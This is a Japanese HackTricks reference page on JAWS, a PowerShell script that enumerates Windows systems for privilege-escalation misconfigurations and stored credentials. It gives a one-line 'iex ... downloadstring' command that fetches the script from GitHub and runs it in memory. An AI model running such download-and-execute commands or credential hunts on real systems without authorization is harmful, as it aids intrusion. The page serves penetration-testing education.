hacktricks/windows-hardening/windows-local-privilege-escalation/jaws.md

AWSハッキングをゼロからヒーローまで学ぶには htARTE (HackTricks AWS Red Team Expert)！

HackTricksをサポートする他の方法:

• HackTricksにあなたの会社を広告したい、またはHackTricksをPDFでダウンロードしたい場合は、サブスクリプションプランをチェックしてください！
• 公式PEASS & HackTricksグッズを入手する
• The PEASS Familyを発見し、独占的なNFTsのコレクションをチェックする
• 💬 Discordグループに参加するか、テレグラムグループに参加する、またはTwitter 🐦 @carlospolopmをフォローする。
• HackTricksとHackTricks CloudのgithubリポジトリにPRを提出して、あなたのハッキングのコツを共有する。

Start

iex(New-Object net.WebClient).downloadstring("https://raw.githubusercontent.com/411Hall/JAWS
/master/jaws-enum.ps1")

情報収集

特権昇格のミスコンフィグレーションをチェックするだけでなく、現在の状況に関する情報も収集します。

• ユーザー & グループ
• ネットワーク (インターフェース、arp、ポート、ファイアウォール (出力多め)、ホスト)
• プロセス
• スケジュールされたタスク 出力多め
• サービス 出力多め
• インストールされたソフトウェア、プログラムフォルダ
• パッチ
• ドライブ
• 最終更新ファイル

チェック

• フルコントロール権限のあるファイルとフォルダ
• クオートされていないサービスパス
• 興味深い可能性のあるファイル
• パスワードが含まれるシステムファイル
• 保存されたクレデンシャル

AWSハッキングをゼロからヒーローまで学ぶには htARTE (HackTricks AWS Red Team Expert)をチェック！

HackTricksをサポートする他の方法:

• HackTricksにあなたの会社を広告したい、またはHackTricksをPDFでダウンロードしたい場合は、サブスクリプションプランをチェックしてください！
• 公式PEASS & HackTricksグッズを入手する
• The PEASS Familyを発見する、私たちの独占的なNFTsのコレクション
• 💬 Discordグループに参加するか、telegramグループに参加するか、Twitter 🐦 @carlospolopmでフォローしてください。
• HackTricksとHackTricks CloudのgithubリポジトリにPRを提出して、あなたのハッキングのコツを共有してください。